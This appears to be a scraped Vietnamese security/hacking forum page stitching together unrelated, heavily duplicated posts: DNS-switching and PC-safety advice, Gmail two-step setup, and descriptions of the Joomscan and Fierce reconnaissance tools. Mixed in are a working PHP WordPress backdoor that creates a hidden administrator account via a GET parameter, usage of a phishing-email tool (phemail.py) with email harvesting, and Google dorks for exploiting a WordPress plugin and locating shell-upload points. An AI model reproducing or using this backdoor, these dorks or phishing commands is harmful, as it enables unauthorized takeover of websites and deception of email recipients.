DNS là thành phần cốt lõi trong mạng Internet. Giao thức giúp chuyển đổi một địa chỉ web, thường được gọi là URL thành một địa chỉ thực, hay địa chỉ IP.
Máy tính biết cách truyền tin đến địa chỉ IP nào đó, nhưng lại không trực tiếp biết được địa chỉ IP từ URL, một dạng địa chỉ danh định giúp người dùng dễ nhớ.
Do vậy, DNS server có mặt để giúp phân giải tên miền giúp máy tính có thể lấy được địa chỉ IP dựa trên URL để truyền thông qua Internet. Không phải chỉ có một DNS server trung tâm làm nhiệm vụ phân giải URL cho tất cả mọi người.
Có rất nhiều DNS server khác nhau trên thế giới được đặt ở phía các nhà cung cấp Internet ISP hay những dịch vụ bên thứ ba như OpenDNS. Trên thực tế, người dùng sẽ sử dụng dịch vụ DNS từ phía ISP nếu không thực hiện bất kỳ thay đổi thiết lập nào đối với máy tính hay bộ định tuyến (router).
Mặc dù vậy, DNS server từ ISP thường là đơn giản, nghĩa là chỉ có chức năng phân giải URL. Chúng thường không trú trọng vào tính bảo mật do vậy những server này khá nhạy cảm với các cuộc tấn công mạng.
Khi một DNS server bị tấn công, sẽ có một số thay đổi có thể xảy đến. Đầu tiên là, server đơn giản chỉ bị gián đoạn hay ngoại tuyến và không thể phân giải URL cho người dùng như bình thường cho đến khi được ISP khắc phục vấn đề.
Thứ hai là, kẻ tấn công có thể thay đổi các bản ghi DNS trên server và trỏ những URL nhất định tới những trang giả mạo khác. Đây là một kiểu tấn công đặc biệt nguy hiểm do những cuộc tấn công lừa đảo (phishing) thường được phát hiện do có URL lạ, nhưng với một DNS server lỗi, URL vẫn hiển thị chính xác như trước nhưng người dùng vẫn bị dẫn đến trang web khác.
Giải pháp
Do vậy, biện pháp an toàn nhất là chuyển sang sử dụng một DNS server được hỗ trợ bảo mật tốt hơn. Có một số dịch vụ DNS cho người dùng chọn lựa như các server DNS công cộng của Google được xây dựng bởi chính gã khổng lồ tìm kiếm và được bảo trì thường xuyên, vì vậy ta sẽ không phải lo lắng về bất kỳ phát sinh hay tấn công mạng nào.
Hoặc, người dùng cũng có thể sử dụng OpenDNS để trải nghiệm DNS đầy đủ hơn. Dịch vụ có những tùy chọn đặc biệt giúp ngăn chặn các loại tấn công mạng nhất định và thậm chí có cả một bộ lọc web khả biến.
Sau khi đã xác định được DNS server muốn chuyển sang sử dụng, bạn sẽ cần thay đổi các thiết lập hệ thống. Cách thay đổi thiết lập này thì khác nhau tùy vào loại hệ điều hành.
Người dùng Windows sẽ cần vào phần thuộc tính mạng sau đó truy cập thuộc tính IPv4 và thay đổi DNS servers ở cuối cửa sổ hiện ra. Người dùng Mac OS X cần vào System Preferences, kích vào Network, chọn thiết bị mạng, kích vào Advanced và sau đó nhập DNS servers sau khi kích vào thẻ DNS.
Người dùng Linux sẽ cần kích vào applet mạng, chọn Edit Connections, nhấn Edit. Dưới thẻ IPv4 Settings, chọn Automatic (DHCP) addresses only, và sau đó thêm DNS servers vào hộp văn bản DNS servers, với mỗi địa chỉ server được ngăn cách bởi một dấu phẩy.
Ngay cả người dùng Android cũng có thể thay đổi DNS server nhưng nó chỉ có tác dụng khi bạn sử dụng Wi-Fi. Do vậy, bạn có thể tìm những thiết lập phù hợp khi nhấn vào phím Menu và chọn Advanced trong khi ở màn hình cài đặt Wi-Fi.
Lưu ý: Các DNS server của Google có địa chỉ 8.8.8.8 và 8.8.4.4 trong khi các server của OpenDNS là 208.67.222.222 và 208.67.220.220.
Kết luận
Những lỗi phát sinh trên DNS server thực sự nghiêm trọng hơn mọi người thường nghĩ rất nhiều do hiếm có ai nói về chúng hay đề cập đến việc chuyển sang server khác. Đổi DNS server nên là ưu tiên trước hết để giữ an toàn cho máy tính của mình.
QTM_(Theo MakeUseOf)
Tăng bảo mật máy tính thông qua DNS server
Một số lời khuyên đơn giản cho việc bảo vệ máy tính
1. Không sử dụng các keygen, các phần mềm crack, vì đó là nơi virus thường ẩn náu.
2. Luôn cập nhật Windows của bạn (cập nhật các phần mềm, bản sửa lỗi bảo mật, bản vá lỗi, gói dịch vụ của Windows).
3. Sao lưu dữ liệu quan trọng của bạn thường xuyên. Có thể bỏ dữ liệu quan trọng vào USB, CD hoặc đưa lên MediaFire,…
4. Sử dụng "chỉ" duy nhất một chương trình Anti Virus tốt.
5. Không nên mở file đính kèm email từ các nguồn không rõ hoặc các tập tin được gửi thông qua một tin nhắn.
6. Chỉ tải về phần mềm từ các nguồn đáng tin cậy.
7. Sử dụng mật khẩu mạnh. Mật khẩu nên có ít nhất tám ký tự và có chữ hoa, chữ thường, số, và các ký hiệu (@, #, &,%, *).
8. Vô hiệu hoá các Plug-in không cần thiết trong trình duyệt web của bạn. Nó sẽ giúp giữ cho bạn an toàn từ các virus độc hại.
9. Đừng đưa ra tên đầy đủ của bạn, địa chỉ, số điện thoại, hoặc thông tin cá nhân khác để bất cứ ai bạn không biết hoặc không có một nhu cầu chính đáng (trong người, qua điện thoại, qua email, hoặc Internet).
10. Tắt máy tính của bạn khi bạn không sử dụng nó. Nếu máy tính có kết nối mạng, nó có thể được tiếp xúc với một cuộc tấn công.
11. Thay thế chương trình dễ bị theo dõi (ví dụ như thay IE bằng Google Chrome hoặc FireFox).
12. Không chia sẻ ảnh trong yahoo với người lạ (virus có thể ở trong tấm ảnh đó,...)
13. Cái này các bác có máu D hay làm. Không vào các trang web đen,…
14. Bỏ chọn dấu tích khi cài các phần mềm miễn phí, thường kèm theo các toolbar của các hãng khác. Khi đã lỡ cài rồi thì nên gỡ ngay để tránh gây khó chịu khi lướt web và nặng máy!
P/S: Chúng ta hãy sử dụng các key MAK để kích hoạt bản quyền cho Windows 7 Professional, tránh dùng keygen hay công cụ bẻ khóa! (DEV_PRO)
2. Luôn cập nhật Windows của bạn (cập nhật các phần mềm, bản sửa lỗi bảo mật, bản vá lỗi, gói dịch vụ của Windows).
3. Sao lưu dữ liệu quan trọng của bạn thường xuyên. Có thể bỏ dữ liệu quan trọng vào USB, CD hoặc đưa lên MediaFire,…
4. Sử dụng "chỉ" duy nhất một chương trình Anti Virus tốt.
5. Không nên mở file đính kèm email từ các nguồn không rõ hoặc các tập tin được gửi thông qua một tin nhắn.
6. Chỉ tải về phần mềm từ các nguồn đáng tin cậy.
7. Sử dụng mật khẩu mạnh. Mật khẩu nên có ít nhất tám ký tự và có chữ hoa, chữ thường, số, và các ký hiệu (@, #, &,%, *).
8. Vô hiệu hoá các Plug-in không cần thiết trong trình duyệt web của bạn. Nó sẽ giúp giữ cho bạn an toàn từ các virus độc hại.
9. Đừng đưa ra tên đầy đủ của bạn, địa chỉ, số điện thoại, hoặc thông tin cá nhân khác để bất cứ ai bạn không biết hoặc không có một nhu cầu chính đáng (trong người, qua điện thoại, qua email, hoặc Internet).
10. Tắt máy tính của bạn khi bạn không sử dụng nó. Nếu máy tính có kết nối mạng, nó có thể được tiếp xúc với một cuộc tấn công.
11. Thay thế chương trình dễ bị theo dõi (ví dụ như thay IE bằng Google Chrome hoặc FireFox).
12. Không chia sẻ ảnh trong yahoo với người lạ (virus có thể ở trong tấm ảnh đó,...)
13. Cái này các bác có máu D hay làm. Không vào các trang web đen,…
14. Bỏ chọn dấu tích khi cài các phần mềm miễn phí, thường kèm theo các toolbar của các hãng khác. Khi đã lỡ cài rồi thì nên gỡ ngay để tránh gây khó chịu khi lướt web và nặng máy!
P/S: Chúng ta hãy sử dụng các key MAK để kích hoạt bản quyền cho Windows 7 Professional, tránh dùng keygen hay công cụ bẻ khóa! (DEV_PRO)
Xem Thêm
[Tool] Joomscan Security Scanner - Update 611 lỗ hổng của Joomla
Hi All,
Nhóm Web-center Security Team của Slovenia vừa update phiên bản mới cho công cụ quét lỗ hổng mang tên Joomscan.
Joomscan là công cụ nhỏ gọn viết bằng ngôn ngữ PERL,dùng scan ứng dụng Joomla.
Ở lần update này,database lỗ hổng đã tăng lên 611 vuls so với 550 vuls vào tháng 11 năm ngoái.
Có thể update thông qua command-line (terminal) bằng lệnh :
Cú pháp sử dụng khá đơn giản :
VD:
- Để scan website uns.vn ta sử dụng : ./joomscan.pl -u uns.vn
- Chi tiết các options : ./joomscan.pl
_LINK DOWNLOAD :
- Windows : http://web-center.si...an/joomscan.rar
- Linux : http://web-center.si...joomscan.tar.gz
Các bạn có thể download source về để optimize và bỏ vào toolbox.
Nhóm Web-center Security Team của Slovenia vừa update phiên bản mới cho công cụ quét lỗ hổng mang tên Joomscan.
Joomscan là công cụ nhỏ gọn viết bằng ngôn ngữ PERL,dùng scan ứng dụng Joomla.
Ở lần update này,database lỗ hổng đã tăng lên 611 vuls so với 550 vuls vào tháng 11 năm ngoái.
Có thể update thông qua command-line (terminal) bằng lệnh :
./joomscan.pl update
Cú pháp sử dụng khá đơn giản :
VD:
- Để scan website uns.vn ta sử dụng : ./joomscan.pl -u uns.vn
- Chi tiết các options : ./joomscan.pl
_LINK DOWNLOAD :
- Windows : http://web-center.si...an/joomscan.rar
- Linux : http://web-center.si...joomscan.tar.gz
Các bạn có thể download source về để optimize và bỏ vào toolbox.
Xem Thêm
Fierce Domain Scan
Written by RSnake with input from id, Vacuum and Robert E Lee. A special thanks to IceShaman to porting it to use multi-threading.
Fierce domain scan was born out of personal frustration after performing a web application security audit. It is traditionally very difficult to discover large swaths of a corporate network that is non-contiguous. It's terribly easy to run a scanner against an IP range, but if the IP ranges are nowhere near one another you can miss huge chunks of networks.
First what Fierce is not. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any un-targeted attacks. It is meant specifically to locate likely targets both inside and outside a corporate network. Only those targets are listed (unless the -nopattern switch is used). No exploitation is performed (unless you do something intentionally malicious with the -connect switch). Fierce is a reconnaissance tool. Fierce is a PERL script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.
First it queries your DNS for the DNS servers of the target. It then switches to using the target's DNS server (you can use a different one if you want using the -dnsserver switch but this can cause problems if the server you use won't tell you information about other people's sites and of course you won't find much relevant internal address space). Fierce then attempts to dump the SOA records for the domain in the very slim hope that the DNS server that your target uses may be misconfigured. Once that fails (because it almost always will) it attempts to "guess" names that are common amongst a lot of different companies. Don't ask me where I got the list, it's just a list of names that id and I have seen all over the place. I thought about adding a dictionary to this, but I think that would take a lot longer, and given that very few of the words are dictionary words I don't think this would add a lot of value.
Next, if it finds anything on any IP address it will scan up and down a set amount (default 5 but you can expand it with -traverse or increase it to the entire subnet with -wide) looking for anything else with the same domain name in it using reverse lookups. If it finds anything on any of those it will recursively scan until it doesn't find any more. In this way it ends up looping a lot, and the bigger the domain is the more you get back. The reason Fierce automatically switches to using the target's DNS server is so that it can probe the Intranet (RFC1918) of the target, assuming the target uses a single DNS server for both their Intranet and external sites.
I also added a random call to something that should fail to test for wildcard DNS. If it's found, the wildcard is discarded to reduce erroneous results. That doesn't speed up the scan because it still needs to check to see if the test resolves back to IP address that the wildcard is pointing to. However it does reduce false positives.
Also, I've added a "search" option that allows you to find other non-related domain names. For example, let's say my target's domain is widget.com but I know they have email addresses like soandso@widgetcompany.com and own another company called nutsandbolts.com I can add search queries. This won't scan for those domains, but if those names pop up, it won't ignore them. Fierce will report on anything inside the search pattern as long as it matches. If you want everything I guess you could put a,b,c,...,x,y,z but I'll probably make something in the future to allow for scanning/reporting the entire C block once anything is found in it that matches the DNS string. Here's the syntax:
perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts
I also realized it can be a little bad about finding everything in a class C if the target used non-contiguous blocks within the class C. To deal with that I built in a function to allow a scan (of only C blocks). This is also really useful for scanning intranets if the DNS is poorly configured. I might expand on this later.
perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com
As an alternative, you can use the -wide switch which does a wide path of reverse lookups after finding any C names that match your query in the C block. This provides a lot more information but is a lot more noisy.
perl fierce.pl -dns example.com -wide -file output.txt
Finally, for the web application security folks I added a command to connect to any http servers on port 80 and perform whatever action you put into a configuration file. This is really noisy and really slow (especially on large networks), so I wouldn't recommend trying it unless you have a few hours with nothing better to do, unless you know there are only a handful of machines or have already ran this without the connect scan turned on.
perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt
Here's what a sample header file might look like. The sample file below is attempting to exploit the Expect cross site scripting vulnerability:
Fierce also has wordlist support so that you can supply your own dictionary using the -wordlist keyword. Since the brute force does rely on matching at least a few internal targets, this could be helpful if you know that the naming convention has to do with a certain non-obvious naming convention or uses another language, etc.
perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt
Not convinced? Prior to running the scan I had never been to either mail.ru or rambler.ru (a few of the top Alexa sites in Russia). Since I don't read Russian, performing an audit against them is far more difficult. Here's some sample output from the two. In the first example you can see that mail.ru has a non-contiguous address for it's mobile.mail.ru than it does for the rest of the site. That would have been very difficult to locate with any other scanner. In the rambler.ru example you can see the RFC1918 space 10.* pop up:
Requirements: This is a PERL program requiring the PERL interpreter with the modules Net::DNS and Net::hostent. You can install modules using CPAN:
Version: Fierce is currently at version 0.9.9 - Beta 03/24/2007
Download: fierce.pl
Download: hosts.txt
(Thanks to Robert E Lee for the help with this and to Michael Thumann's DNSDigger wordlist).
Getting started: perl fierce.pl -help
This may some bugs in it. Also this can be a noisy scanner, but in the tests I've performed it's exceptionally effective at finding non-contiguous IP blocks and new attack points. This should be considered a pre-cursor to nmap, unicornscan or nessus as it gives you enough information to begin a much more thorough scan with one of those other tools. Also, it can point out DNS entries for hosts that are no longer up or have not yet been put into production. Please use Fierce with care and at your own risk.
Fierce domain scan was born out of personal frustration after performing a web application security audit. It is traditionally very difficult to discover large swaths of a corporate network that is non-contiguous. It's terribly easy to run a scanner against an IP range, but if the IP ranges are nowhere near one another you can miss huge chunks of networks.
First what Fierce is not. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any un-targeted attacks. It is meant specifically to locate likely targets both inside and outside a corporate network. Only those targets are listed (unless the -nopattern switch is used). No exploitation is performed (unless you do something intentionally malicious with the -connect switch). Fierce is a reconnaissance tool. Fierce is a PERL script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.
First it queries your DNS for the DNS servers of the target. It then switches to using the target's DNS server (you can use a different one if you want using the -dnsserver switch but this can cause problems if the server you use won't tell you information about other people's sites and of course you won't find much relevant internal address space). Fierce then attempts to dump the SOA records for the domain in the very slim hope that the DNS server that your target uses may be misconfigured. Once that fails (because it almost always will) it attempts to "guess" names that are common amongst a lot of different companies. Don't ask me where I got the list, it's just a list of names that id and I have seen all over the place. I thought about adding a dictionary to this, but I think that would take a lot longer, and given that very few of the words are dictionary words I don't think this would add a lot of value.
Next, if it finds anything on any IP address it will scan up and down a set amount (default 5 but you can expand it with -traverse or increase it to the entire subnet with -wide) looking for anything else with the same domain name in it using reverse lookups. If it finds anything on any of those it will recursively scan until it doesn't find any more. In this way it ends up looping a lot, and the bigger the domain is the more you get back. The reason Fierce automatically switches to using the target's DNS server is so that it can probe the Intranet (RFC1918) of the target, assuming the target uses a single DNS server for both their Intranet and external sites.
I also added a random call to something that should fail to test for wildcard DNS. If it's found, the wildcard is discarded to reduce erroneous results. That doesn't speed up the scan because it still needs to check to see if the test resolves back to IP address that the wildcard is pointing to. However it does reduce false positives.
Also, I've added a "search" option that allows you to find other non-related domain names. For example, let's say my target's domain is widget.com but I know they have email addresses like soandso@widgetcompany.com and own another company called nutsandbolts.com I can add search queries. This won't scan for those domains, but if those names pop up, it won't ignore them. Fierce will report on anything inside the search pattern as long as it matches. If you want everything I guess you could put a,b,c,...,x,y,z but I'll probably make something in the future to allow for scanning/reporting the entire C block once anything is found in it that matches the DNS string. Here's the syntax:
perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts
I also realized it can be a little bad about finding everything in a class C if the target used non-contiguous blocks within the class C. To deal with that I built in a function to allow a scan (of only C blocks). This is also really useful for scanning intranets if the DNS is poorly configured. I might expand on this later.
perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com
As an alternative, you can use the -wide switch which does a wide path of reverse lookups after finding any C names that match your query in the C block. This provides a lot more information but is a lot more noisy.
perl fierce.pl -dns example.com -wide -file output.txt
Finally, for the web application security folks I added a command to connect to any http servers on port 80 and perform whatever action you put into a configuration file. This is really noisy and really slow (especially on large networks), so I wouldn't recommend trying it unless you have a few hours with nothing better to do, unless you know there are only a handful of machines or have already ran this without the connect scan turned on.
perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt
Here's what a sample header file might look like. The sample file below is attempting to exploit the Expect cross site scripting vulnerability:
Fierce also has wordlist support so that you can supply your own dictionary using the -wordlist keyword. Since the brute force does rely on matching at least a few internal targets, this could be helpful if you know that the naming convention has to do with a certain non-obvious naming convention or uses another language, etc.
perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt
Not convinced? Prior to running the scan I had never been to either mail.ru or rambler.ru (a few of the top Alexa sites in Russia). Since I don't read Russian, performing an audit against them is far more difficult. Here's some sample output from the two. In the first example you can see that mail.ru has a non-contiguous address for it's mobile.mail.ru than it does for the rest of the site. That would have been very difficult to locate with any other scanner. In the rambler.ru example you can see the RFC1918 space 10.* pop up:
- mail.ru - 418 entries and 303 hostnames found.
- rambler.ru - 472 entries and 458 hostnames found.
Requirements: This is a PERL program requiring the PERL interpreter with the modules Net::DNS and Net::hostent. You can install modules using CPAN:
perl -MCPAN -e 'install Net::DNS'Windows users: You can use Fierce under Windows if you use Cygwin with PERL and the above two modules installed. I have not tested this using ActivePerl in Windows, so I would recommend Cygwin until ActivePerl can be thoroughly tested. I am/was working on a win32 version of Fierce, but have put the project on hold. If anyone is interested in picking up where I left off, drop me a line.
perl -MCPAN -e 'install Net::hostent'
Version: Fierce is currently at version 0.9.9 - Beta 03/24/2007
Download: fierce.pl
Download: hosts.txt
(Thanks to Robert E Lee for the help with this and to Michael Thumann's DNSDigger wordlist).
Getting started: perl fierce.pl -help
This may some bugs in it. Also this can be a noisy scanner, but in the tests I've performed it's exceptionally effective at finding non-contiguous IP blocks and new attack points. This should be considered a pre-cursor to nmap, unicornscan or nessus as it gives you enough information to begin a much more thorough scan with one of those other tools. Also, it can point out DNS entries for hosts that are no longer up or have not yet been put into production. Please use Fierce with care and at your own risk.
Xem Thêm
Phemail.py: Phishing EMail Social Engineering Tool
Social Engineering
is defined as the process of inducing people into giving away access or
confidential information. From a security consultant point of view this
topic is not new and there are many tools which can be used against the
target.
phemail.py - Phishing
EMAIL. The main purpose of this tool is to prove who clicked on the
phishing email without attempting to exploit the web browser but
collecting as much information as possible. For this reason it will be
100% undetectable by any antivirus and it will obtain sufficient data to
have an initial proof of concept for the client.
- Find corporate email addresses: Phemail has an option for harvesting corporate email addresses and save them to a file. Phemail.py leverages Google to search for LinkedIn specific corporate e-mail targets.
- Create a phishing email template: You get to create your own custom phishing templates. Do not forget to add the string “{0}” in each URL as the script will replace this string with the correct URL automatically.
- Host/upload a single PHP file: This file contains JavaScript code which attempts to collect web browser information and save it in a log file in /tmp directory.
- Run the php file as shown in the following example: # phemail.py -e test-emails.txt -f "Tax report " -r "Tax Report " -s "Important information about your tax" -b body.txt -w http://YOUR-WEBSITE.com
Xem Thêm
WordPress Admin Access Backdoor
<?php add_action('wp_head', 'my_backdoor'); function my_backdoor() { If ($_GET['backdoor'] == 'go') { require('wp-includes/registration.php'); If (!username_exists('private')) { $user_id = wp_create_user('private', '12345678'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>
Xem Thêm
[TUT] Share Autotype
TUT Autotype
+ Chức Năng Coppy Text tự động điền vào form order Sau 3s
Link Download : http://www.mediafire.com/?214ra2fvzfsnh0k
Hướng Dẫn : http://www.mediafire.com/?bwbbdh0ei28pqdt
1, RUN Windows Installer 3.1
2, RUN Windows Imaging Component
3, RUN Microsoft .NET Framework 4
4, AutoTyper.exe
--------------------------------------------------------
1 - Windows Installer 3.1
http://www.microsoft.com/en-us/downl...ils.aspx?id=25
-------------
2 - Windows Imaging Component
http://www.microsoft.com/en-us/downl...ils.aspx?id=32
-------------
3 - Microsoft .NET Framework 4
http://www.microsoft.com/en-us/downl....aspx?id=17718
+ Chức Năng Coppy Text tự động điền vào form order Sau 3s
Link Download : http://www.mediafire.com/?214ra2fvzfsnh0k
Hướng Dẫn : http://www.mediafire.com/?bwbbdh0ei28pqdt
1, RUN Windows Installer 3.1
2, RUN Windows Imaging Component
3, RUN Microsoft .NET Framework 4
4, AutoTyper.exe
--------------------------------------------------------
1 - Windows Installer 3.1
http://www.microsoft.com/en-us/downl...ils.aspx?id=25
-------------
2 - Windows Imaging Component
http://www.microsoft.com/en-us/downl...ils.aspx?id=32
-------------
3 - Microsoft .NET Framework 4
http://www.microsoft.com/en-us/downl....aspx?id=17718
Xem Thêm
WordPress Blog Exploit
search google: inurl:"fbconnect_action=myhome"
thay
?fbconnect_action=myhome&userid=
Xem Thêm
dork up shell hình ảnh
Hidden Block (1 post(s) are required, you have 1):
inurl:"modules/filemanagermodule/actions/?picker.php??id= 0"
|
Xem Thêm
Một số mẫu Regular Expressions
Regular Expressions xuất hiện một cách thường xuyên và gần như không thể
thiếu với một lập trình viên chuyên nghiệp không chỉ trong PHP mà ở
nhiều ngôn ngữ khác , nó rất tiện dụng và hữu ích. Xin giới thiệu một
vài mẫu Regex hữu ích sau mà mình sưu tầm được
Xem Thêm
Hạn chế hack gmail
Khi bị người khác biết được pass gmail của mình thì việc bạn bị mất dữ
liệu hoặc bí mật bên trong hộp thư của bạn là chắc. Vậy làm sao chúng ta
khắc chế được để có bảo mật cao hơn? Thực ra trong gmail có chức năng
kích hoạt 2 lớp cảnh báo bảo vệ, nếu áp dụng nó thì kể cả người ta biết
pass gmail của ta cũng chưa chắc đã vào được hòm thư của mình.
Thủ thuật này được tôi tóm lược như sau:
1. Bạn click vào mục Accounts settings ở góc phải của hòm thư, sau đó Google sẽ chuyển giao diện đến trang thiết lập chung cho tài khoản Google Accounts.
Tại thẻ Security, mục Using 2-step verification bạn click chọn nút Edit để tiến hành kích hoạt chức năng chứng thực hai lớp.
[IMG][/IMG]
2. Sau đó Google sẽ chuyển đến các trang giới thiệu về tính năng bảo mật này. Bạn tiếp tục click See how it works! và Start setup để chuyển sang bước cài đặt mã chứng thực trên thiết bị di động.
[IMG][/IMG]
3. Tiếp theo bạn nhập số điện thoại và chọn cách nhận mã chứng thực qua tin nhắn (text messages) hay cuộc gọi thoại (voice call – ở đây bạn sẽ nhận được một cuộc gọi tự động đọc cho bạn mã xác nhận băng tiếng Anh). Bạn nên chọn hình thức SMS và nhấn Send code. Sau vài giây hệ thống sẽ gửi vào điện thoại của bạn mã số đăng ký.
[IMG][/IMG]
Bạn tiếp tục dùng mã số này để nhập vào ô trống trong phần Type the code you receive in the phone message, and click Verify. Hoàn tất công đoạn bạn nhấn Verify để xác nhận sử dụng số điện thoại di động trên để nhận mã chứng thực đăng nhập từ Google.
Sau bước này bạn có thể yên tâm vì hòm thư Gmail của mình đã được trang bị 2 tầng bảo vệ.
Chúc các bạn thành công!
Thủ thuật này được tôi tóm lược như sau:
1. Bạn click vào mục Accounts settings ở góc phải của hòm thư, sau đó Google sẽ chuyển giao diện đến trang thiết lập chung cho tài khoản Google Accounts.
Tại thẻ Security, mục Using 2-step verification bạn click chọn nút Edit để tiến hành kích hoạt chức năng chứng thực hai lớp.
[IMG][/IMG]
2. Sau đó Google sẽ chuyển đến các trang giới thiệu về tính năng bảo mật này. Bạn tiếp tục click See how it works! và Start setup để chuyển sang bước cài đặt mã chứng thực trên thiết bị di động.
[IMG][/IMG]
3. Tiếp theo bạn nhập số điện thoại và chọn cách nhận mã chứng thực qua tin nhắn (text messages) hay cuộc gọi thoại (voice call – ở đây bạn sẽ nhận được một cuộc gọi tự động đọc cho bạn mã xác nhận băng tiếng Anh). Bạn nên chọn hình thức SMS và nhấn Send code. Sau vài giây hệ thống sẽ gửi vào điện thoại của bạn mã số đăng ký.
[IMG][/IMG]
Bạn tiếp tục dùng mã số này để nhập vào ô trống trong phần Type the code you receive in the phone message, and click Verify. Hoàn tất công đoạn bạn nhấn Verify để xác nhận sử dụng số điện thoại di động trên để nhận mã chứng thực đăng nhập từ Google.
Sau bước này bạn có thể yên tâm vì hòm thư Gmail của mình đã được trang bị 2 tầng bảo vệ.
Chúc các bạn thành công!